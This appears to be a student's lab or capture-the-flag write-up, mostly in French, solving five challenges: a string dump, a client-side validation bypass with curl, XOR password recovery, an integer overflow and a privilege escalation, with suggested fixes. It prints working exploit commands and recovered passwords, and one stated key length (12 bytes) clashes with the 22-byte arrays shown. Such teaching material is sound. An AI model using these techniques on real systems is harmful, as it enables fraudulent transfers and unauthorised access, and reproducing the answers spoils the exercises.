# Challenge 1

I ran `strings ./chall1` to produce a list of strings present in the binary and
tried some strings that looked suspicious.

> password: `Homer_Want_A_Donet`

# Challenge 2

En examinant le code source de la page, on peut apprécier le montant maximal est
limité côté client :

```html
<input type="number" name="amount" min="1" max="1000" class="form-control">
```

En plus de cela, on s'aperçoit que l'impossibilité de modifié le compte source
et destination sont également imposées côté client. Lorsque l'on essaie
d'effectuer une requête manuellement, on constate qu'il y a pas de vérification
côté serveur.

```sh
$ curl 'http://10.192.72.221:8082/process' --data-raw 'src_account=GENTILLE_VICTIME&dst_account=MECHANT_HACKER&amount=1000000'                                         <html>
   <body>
       <h1>Congrats, you solved the challenge!</h1>
   </body>
</html>
```

### Question 4.1

> Que pouvez-vous dire sur les vérifications faites côté client ?

Les limites des montants sont vérifiés côté client et ne peuvent donc pas
empêcher une attaque.

### Question 4.2

> Que faudrait-il faire pour améliorer la sécurité de ce site ?

Faire une vérification côté serveur, où le code ne peut pas être modifié par un
utilisateur malveillant.

# Challenge 3

Après décompiler le fichier `Chall3.class`, on s'aperçoit de l'existence d'un
array auquel on on applique byte à byte l'opération XOR (aussi appelé « _pad_ »).

```java
int[] otp = new int[]{86, 156, 85, 11, 29, 135, 204, 77, 172, 242, 83, 69, 182, 210, 161, 2, 240, 0, 87, 112, 52, 243};
int[] dst = new int[22];
...
  for (int i = 0; i < dst.length && i < attempt.length(); ++i) {
      dst[i] = (char)(attempt.charAt(i) ^ otp[i % otp.length]);
  }
```

On peut aussi remarquer que le résultat de cette opération est comparé avec une
suite de bytes fixe:

```java
int[] target = new int[]{4, 173, 39, 56, 126, 180, 191, 122, 206, 194, 61, 53, 134, 167, 211, 110, 196, 115, 99, 30, 3, 192};
...
    if (Arrays.toString(dst).equals(Arrays.toString(target))) {
```

De ce on peut en déduire une longueur acceptable pour la clé (soit 12 bytes).

Si on réalise une opération de XOR byte à byte avec le _pad_, on peut trouver
une séquence de bytes acceptable pour ce test :

```python3
> otp = [86, 156, 85, 11, 29, 135, 204, 77, 172, 242, 83, 69, 182, 210, 161, 2, 240, 0, 87, 112, 52, 243]
> tg = [4, 173, 39, 56, 126, 180, 191, 122, 206, 194, 61, 53, 134, 167, 211, 110, 196, 115, 99, 30, 3, 192]
> bytes(a ^ b for a, b in zip(otp, tg)).decode()
'R1r3c3s7b0np0url4s4n73'
```

```
$ printf 'R1r3c3s7b0np0url4s4n73' | java Chall3
Portail TOP SECRET de la Confédération Hélvétique
=================================================
Entrez votre mot de passe pour accéder aux informations confidentielles:
Félicitations! Vous êtes connecté sur le portail TOP SECRET de la Confédération Hélvétique.
```

# Challenge 4

En regardant le code, on s'aperçoit qu'il y a une opération dans l'entier avant
de la comparaison. On peut donc abuser le fait que la somme d'entiers n'est pas
vérifier pour des éventuels overflows.

```java
public static void sendMoney(int francs) {
  if (francs*100 <= MAXIMUM_CENTIMES_ALLOWED) {
    transfer(francs);
  }
  else{
    System.out.println("You ... [elipsed]
  }
}
```

```sh
$ java Chall4 "$((2**30))"
Congrats! You solved the challenge!
```

## Question 6.1

> Quelle est la vulnérabilité que ce programme présente ?

Le chiffre comparé est susceptible à un _integer overflow_. Ce qui peut générer
des valeurs incohérentes entre le test et l'utilisation de ladite valeur.

## Question 6.2

> Comment peut-on corriger ce problème ?

En testant la valeur reçue sans la convertir.

# Challenge 5

Pour exploiter la vulnérabilité il suffit de choisir d'envoyer une petite
valeur, rentrer une valeur invalide (e.g. la string 'foo') et ensuite
sélectionner l'option 2 pour envoyer une valeur quelconque, puis envoyer
n'importe quel montant.

```
$ java Chall5
Select option:
1: send small amount
2: send arbitrary amount (admin required)
Enter a number between 1 and 2
1
You are sending a small amount (max 1000). Please enter the amount.
foo
You have to enter an integer.
Select option:
1: send small amount
2: send arbitrary amount (admin required)
Enter a number between 1 and 2
2
You are admin. How much do you want to send?
100000
Congrats! You solved the challenge.
```

## Question 7.1

> Quelle est la vulnérabilité que ce programme présente ?

Ce programme admet une élévation de privilège.
En lisant le code source, on s'aperçoit que lorsque n'importe quel utilisateur
envoie un petit montant, les privilèges administrateur sont momentanément
accordés à l'exécution et retiré après avoir effectuer l'opération. Si l'on
parvenait à interrompre le flot d'exécution mais que l'application continue son
exécution on se retrouverait avec les droits administrateur.

Étant donné que on demande à l'utilisateur s'il veut effectuer un petit virement
ou un virement non limité avant et ensuite on demande le montant, on accorde les
droits administrateur avant que le montant ne soit introduit. Un utilisateur
malveillant peut ensuite fournir une valeur invalide qui engendrerait une
interruption dans l'exécution du programme, on peut remarquer dans les sources
que malgré cette exception, le programme continuerait à s'exécuter.

## Question 7.2

> Comment peut-on corriger ce problème ?

On peut lire le montant que l'utilisateur essaye de transférer une seule fois et
ainsi déterminer l'action à faire. En plus il faudrait prévoir le cas où un
utilisateur non-administrateur essaye de faire un virement et non pas changer
la politique de sécurité en cours de route (i.e. faire passer un utilisateur non
administrateur comme administrateur).
